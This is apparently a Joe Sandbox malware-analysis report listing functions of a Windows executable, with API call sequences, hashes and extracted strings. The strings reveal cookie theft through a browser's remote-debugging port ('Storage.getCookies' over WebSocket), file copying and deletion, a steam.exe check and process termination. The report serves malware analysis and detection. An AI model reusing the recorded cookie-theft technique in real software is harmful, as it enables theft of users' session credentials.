                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                  • API String ID: 958055206-1862457068
                                  • Opcode ID: 2388e38ef69387c1c9dff48e45bf61b32b745e7645632d33020c085c4530b88e
                                  • Instruction ID: e4e3583531a3a55751fef7c89c69cc932d554d4adf0619394f4c58fff7d046cf
                                  • Opcode Fuzzy Hash: 2388e38ef69387c1c9dff48e45bf61b32b745e7645632d33020c085c4530b88e
                                  • Instruction Fuzzy Hash: 0C91A571900208ABDB64EFF4DC49FDE77B8AF44700F5440A9F619AB281DB74EA449FA0
                                  Function 00FCE210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00FCE22C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00FCE243
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FCE263
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FCE27D
                                  • wsprintfA.USER32 ref: 00FCE2A2
                                  • StrCmpCA.SHLWAPI(?,00FDCFEC), ref: 00FCE2B4
                                  • wsprintfA.USER32 ref: 00FCE2D1
                                    • Part of subcall function 00FCEDE0: lstrcpy.KERNEL32(00000000,?), ref: 00FCEE12
                                  • wsprintfA.USER32 ref: 00FCE2F0
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 00FCE304
                                  • lstrcat.KERNEL32(?,01B9E7B8), ref: 00FCE335
                                  • lstrcat.KERNEL32(?,00FE1794), ref: 00FCE347
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE358
                                  • lstrcat.KERNEL32(?,00FE1794), ref: 00FCE36A
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE37E
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00FCE394
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE3D2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE422
                                  • DeleteFileA.KERNEL32(?), ref: 00FCE45C
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1557
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1579
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB159B
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB15FF
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FCE49B
                                  • FindClose.KERNEL32(00000000), ref: 00FCE4AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 1375681507-2848263008
                                  • Opcode ID: b2ed49548ebcb54efe2f8c3d27498048ee3c00cee8ec326db98aac854447c3e9
                                  • Instruction ID: 2272813c6ac67152566aaceb2c3fe21359f188293b6dc846c9180e0b0d930a57
                                  • Opcode Fuzzy Hash: b2ed49548ebcb54efe2f8c3d27498048ee3c00cee8ec326db98aac854447c3e9
                                  • Instruction Fuzzy Hash: F781A171D002199BCB24EFA5DD49EEE77BDBF44300F0449A8B51AA7140DB38EA84DFA1
                                  Function 00FB16B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB16E2
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB1719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB176C
                                  • lstrcat.KERNEL32(00000000), ref: 00FB1776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB17A2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB18F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB18FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat
                                  • String ID: \*.*
                                  • API String ID: 2276651480-1173974218
                                  • Opcode ID: d58b768a2cc8f7462bb8004676c116d619a1904d4125d2258fe6e9f5ccbde5ba
                                  • Instruction ID: aa5b85f17511cffe148a74dba500a8fa6329dc8e824c745dda9652fa9afefe8d
                                  • Opcode Fuzzy Hash: d58b768a2cc8f7462bb8004676c116d619a1904d4125d2258fe6e9f5ccbde5ba
                                  • Instruction Fuzzy Hash: 50818C3191024A9BCB21EFAADC99AEE77B9BF40314F540124F815AB245CB38DC41FFA1
                                  Function 00FCDD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FCDD45
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FCDD4C
                                  • wsprintfA.USER32 ref: 00FCDD62
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00FCDD79
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FCDD9C
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FCDDB6
                                  • wsprintfA.USER32 ref: 00FCDDD4
                                  • DeleteFileA.KERNEL32(?), ref: 00FCDE20
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00FCDDED
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1557
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1579
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB159B
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB15FF
                                    • Part of subcall function 00FCD980: memset.MSVCRT ref: 00FCD9A1
                                    • Part of subcall function 00FCD980: memset.MSVCRT ref: 00FCD9B3
                                    • Part of subcall function 00FCD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FCD9DB
                                    • Part of subcall function 00FCD980: lstrcpy.KERNEL32(00000000,?), ref: 00FCDA0E
                                    • Part of subcall function 00FCD980: lstrcat.KERNEL32(?,00000000), ref: 00FCDA1C
                                    • Part of subcall function 00FCD980: lstrcat.KERNEL32(?,01B9E0B8), ref: 00FCDA36
                                    • Part of subcall function 00FCD980: lstrcat.KERNEL32(?,?), ref: 00FCDA4A
                                    • Part of subcall function 00FCD980: lstrcat.KERNEL32(?,01B9D640), ref: 00FCDA5E
                                    • Part of subcall function 00FCD980: lstrcpy.KERNEL32(00000000,?), ref: 00FCDA8E
                                    • Part of subcall function 00FCD980: GetFileAttributesA.KERNEL32(00000000), ref: 00FCDA95
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FCDE2E
                                  • FindClose.KERNEL32(00000000), ref: 00FCDE3D
                                  • lstrcat.KERNEL32(?,01B9E7B8), ref: 00FCDE66
                                  • lstrcat.KERNEL32(?,01B9D9B0), ref: 00FCDE7A
                                  • lstrlen.KERNEL32(?), ref: 00FCDE84
                                  • lstrlen.KERNEL32(?), ref: 00FCDE92
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCDED2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 4184593125-2848263008
                                  • Opcode ID: 48782fec66789f9c619f101c939450d8af34b66216bc8d3e75c927f8068619fd
                                  • Instruction ID: dffff229b4062fdd8467a9467c4a447d16320217cd92690d6aefa2f881af8f6b
                                  • Opcode Fuzzy Hash: 48782fec66789f9c619f101c939450d8af34b66216bc8d3e75c927f8068619fd
                                  • Instruction Fuzzy Hash: 06619271900209ABCB24EFF4DD89AEE77B9BF48310F0045A8B516A7245DB38EA84DF50
                                  Function 00FCD530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00FCD54D
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00FCD564
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FCD584
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FCD59E
                                  • lstrcat.KERNEL32(?,01B9E7B8), ref: 00FCD5E3
                                  • lstrcat.KERNEL32(?,01B9E958), ref: 00FCD5F7
                                  • lstrcat.KERNEL32(?,?), ref: 00FCD60B
                                  • lstrcat.KERNEL32(?,?), ref: 00FCD61C
                                  • lstrcat.KERNEL32(?,00FE1794), ref: 00FCD62E
                                  • lstrcat.KERNEL32(?,?), ref: 00FCD642
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCD682
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCD6D2
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FCD737
                                  • FindClose.KERNEL32(00000000), ref: 00FCD746
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 50252434-4073750446
                                  • Opcode ID: 32fa52833cf89e844a2c4606776f16e3f3a73c70def310d5b2bdda2098dbbfbf
                                  • Instruction ID: 60540713abdc00ff786b121a0b011bae162cf34daa16252d7c629cf2f9c941c8
                                  • Opcode Fuzzy Hash: 32fa52833cf89e844a2c4606776f16e3f3a73c70def310d5b2bdda2098dbbfbf
                                  • Instruction Fuzzy Hash: 1C619571D102199BCB64EFB5DD85ADE77B8BF48310F0444A8E659A7240DB38EA84DF90
                                  Function 00FD48B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                  • API String ID: 909987262-758292691
                                  • Opcode ID: 478e46b085d17860727e16a0551378e914f830b5137c0ebf75335d9ea514d167
                                  • Instruction ID: 3595da7f98a8acb6390a6b9633019ef4a1c843fe87599bb5086833028df74ef3
                                  • Opcode Fuzzy Hash: 478e46b085d17860727e16a0551378e914f830b5137c0ebf75335d9ea514d167
                                  • Instruction Fuzzy Hash: 0DA26971D012699FDF20DFA8C8807DDBBB6AF48300F1881AAD518A7341DB755E85EF91
                                  Function 00FC23A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC23D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC23F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC2402
                                  • lstrlen.KERNEL32(\*.*), ref: 00FC240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00FC2436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC2486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: 4c52a0406dbdf63ba864fd5113cd896fafd0804e609aa987231a3c4830f3a438
                                  • Instruction ID: 1d1363662c8fdb5350a394fb4367fa0365bd5defc4a3bca9ee5d4c0b502af69c
                                  • Opcode Fuzzy Hash: 4c52a0406dbdf63ba864fd5113cd896fafd0804e609aa987231a3c4830f3a438
                                  • Instruction Fuzzy Hash: B841603151020A8BCBB5FFA5DD86BDE77A9EF50314F045128B85AAB212CB38DC41BF90
                                  Function 00FD46A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00FD46B9
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00FD46C9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD46DB
                                  • StrCmpCA.SHLWAPI(?,?), ref: 00FD46ED
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FD4702
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FD4711
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD4718
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD4726
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD4731
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 71fd0cf7b5beac01782098932b95367e174530a3a27d204683978679f1352880
                                  • Instruction ID: 1fd55451e75e86b14d150fa3b180413f0da111ca5b53e731a16590fb13706af8
                                  • Opcode Fuzzy Hash: 71fd0cf7b5beac01782098932b95367e174530a3a27d204683978679f1352880
                                  • Instruction Fuzzy Hash: E701A1315011186BE7349BE09C8CFFE3BBCAB45B15F0400A9FA15D9184EF74A9809B61
                                  Function 00FD4610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00FD4628
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00FD4638
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD464A
                                  • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00FD4660
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD4672
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD467D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
